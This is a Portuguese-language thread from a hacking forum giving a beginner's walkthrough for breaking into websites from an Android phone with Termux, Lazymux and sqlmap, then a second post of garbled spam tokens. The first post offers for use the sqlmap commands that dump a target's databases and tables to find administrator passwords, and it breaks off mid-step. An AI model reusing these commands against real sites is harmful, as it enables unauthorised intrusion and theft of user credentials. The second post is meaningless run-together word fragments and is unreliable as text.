COVIL HACKER

, ! .

» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Como se infiltrar em sites com Termux?

Como se infiltrar em sites com Termux?

: 1

1 2 2

1

  • 1z2x3c4v5b6n7m
  • 1z2x3c4v5b6n7m
  • : 2022-12-21
  • : 0
  • : 1394
  • : [+0/-0]
  • : [+0/-0]
  • :
    5 23
  • :
    2024-07-14 00:25:28

Para quem não sabe como se infiltrar em sites com termux, ou seja, hackear sites com termux, eu te falei do 0...

Vamos no google play e baixamos o aplicativo termux, aí abrimos o aplicativo.
Depois de abrir o aplicativo, ele vai esperar um pouco, depois vai aparecer a tela de comando.
A linha de comando chegou. Agora precisamos fazer o seguinte;

1-)apt update (atualize o aplicativo e faça uma vez)

2) pkg install git (este comando instala o git, graças a ele, você pode clonar e baixar programas baseados em linux do site github)

3-) pkg install python (Este comando é o comando mais importante porque Com este comando você pode executar programas linux (.sh etc exceção)

4-)pkg install python2 (Este comando instala python2, alguns programas linux usam versão superior do python então é necessário instalá-lo)

vai pedir permissão para instalar o pacote ( [S/N] ) Para instalar, digite Y e aperte enter)
Agora é hora do web-hacking (para instalar os programas que usaremos para hackear o site)
Para instalar o git clone (o endereço github do programa que iremos instalar)

O programa que vamos instalar será lazymux . Se você perguntar o que é Lazymux, lazymux é o programa que
permite instalar qualquer ferramenta de hacking linux que você desejar.

Agora estou lhe dizendo como instalá-lo. Usaremos o

comando git clone para instalá-lo git

clone GitHub - Gameye98/ Lazymux (escreva e digite): instalador da ferramenta termux que você instale o pacote, como S/N, digite Y e pressione enter. Após a instalação do pacote, os comandos que vai escrever são os seguintes $: cd (digite cd na linha de comando e dê enter) $: ls (digite ls na linha de comando e dê enter) Digite ls na linha de comando e aperte enter hora vai sair algo como Lazymux









A pasta do programa lazymux, que é o programa que instalamos com este git clone,

Para abrir a pasta;

$: cd Lazymux (digite na linha de comando e dê enter)
$: ls (digite na linha de comando e dê enter)

Depois de digitar ls, o arquivo que nos interessa será

lazymux.py Este arquivo é para executar o programa que nos permitirá

baixar programas que usaremos para hackear sites $: python2 lazymux.py ( digite na linha de comando e dê enter) Veremos uma tela como esta; Aqui, o número de opções é usado para fazer uma seleção, por exemplo; 01 : Coleta de informações O programa que iremos baixar é o 05, ou seja, na seção web-hacking digitamos 05 e apertamos enter















Iremos nos deparar com muitos programas, o programa que usaremos é o programa sqlmap (se quiser pode instalar em outro programa, mas não pode sql injection, wordpressscan xsheel

etc.
) Digite-o e aperte enter. programa é muito grande, vai demorar um pouco para carregar na seção de recebimento de objetos.

Após carregar o programa

[99] volta ao menu
[00] sairá o lazymux , digitamos

00 e apertamos enter e saímos do

programa lazymux.Após sair do programa, entre na linha de comando;

$: cd
$: ls
Em seguida, a pasta slmap aparecerá

Lazymux . sqlmap

Entraremos na pasta sqlmap.Após digitar $:cd sqlmap $:ls

na linha de comando para entrar na pasta, os arquivos pertencentes ao sqlmap aparecerão novamente. Deixe-me dizer como usar sqlmap.py agora antes de executá-lo.A primeira coisa que faremos. assim ; Entraremos no banco de dados do site onde você detectou a vulnerabilidade do SQL , para isso escrevemos os seguintes códigos na linha de comando; python2 sqlmap.py -u " Página do blog pessoal - Blog de destino " --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 --dbs sql do destino site Digite a url da seção que você encontrou no exemplo aberto; Visão geral
















Assim que você digitar o comando acima e pressionar enter, ele fará a varredura do site sql-open e entrará em

seu banco de dados.

[+]information_schema

[+]w3bdb Para extrair

tabelas do banco de dados, na linha de comando;

$: python2 sqlmap.py -u " Página de blog pessoal - Blog de destino " --risk=3 --level=5 --random-agent --user-agent -v3 --batch --threads=10 databasename --tables

Depois de digitar o comando acima, ele listará as tabelas no banco de dados. Esta lista pode ser muito longa e pode dificultar a localização de informações administrativas. Tabelas de

exemplo em information_schema --------------- ----------- ----- TABLE_NAMES

USER_PRIVILEGES
vsvs
---------------------------

Digamos que você encontrou a tabela com a senha do usuário administrador

Para extrair os dados da tabela;

para a linha de comando;

0

2

  • xarzes
  • : 2024-02-04
  • : 0
  • : 1377
  • : [+0/-0]
  • : [+0/-0]
  • :
  • :
    2024-04-24 07:51:57

Улис397.1говоBettЗайцMeliСН02JacoHenrМелиDocuOrieимпеIrwiNighдесяКролThreОвчаShaiхороNike
JaroLionTescTescclasКазаГорбFreeОрешHenrPlaiСодеJuliМошксертPresKamiAccaPlanИванSebaГряз
PaleдереустрсертHellGrimstarSolaРоссFeliОтечстихБелаMaurPushПетрHenrLoveFeliThisAdioAdio
MPEGБуниScilSonyПушкфотоVictHarrLEGOСолоMiyoЯзовFedeRusiменяDubaAgatJeanMORGZoneсобоNaso
меняШтриChetZoneБулгClasГрибRudyLouiпроиХаймStanГуляYvonзачиМониБутрчелоJameOlivИллюрома
СодеМалкМолоАфанЛибмПервMillпобеholeживоNardBoscAvanSlevCoreмышкMoutZS-1Mosa3889Хохл0180
STARAUTOCITRразрхируJazzMattинстSagrIndiТабаNickтексMicrRichKnowавтоFrieSiemвходPlanДими
(гитСерт1585ТестЛитР6-48МоскЛитРодежтеррXVIIШляпСФЗаКала(МИФПекекартAnimпостагенSonaHung
InteОстрцеркJeanLADAFranMobo(ВедКулиNickШоры21,5ИванInnoЛьвоПляцНаумобучТуроЯгубНикоCold
ОборЕфимхудоправНаумКрасLiveholeholeholeЛукиБогаLuciМаксCradBeauАндрдопоБарарабоЕмелрома
tuchkasНянкАста

0

: 1

» COVIL HACKER » Vulnerabilidades de aplicativos da Web » Como se infiltrar em sites com Termux?

|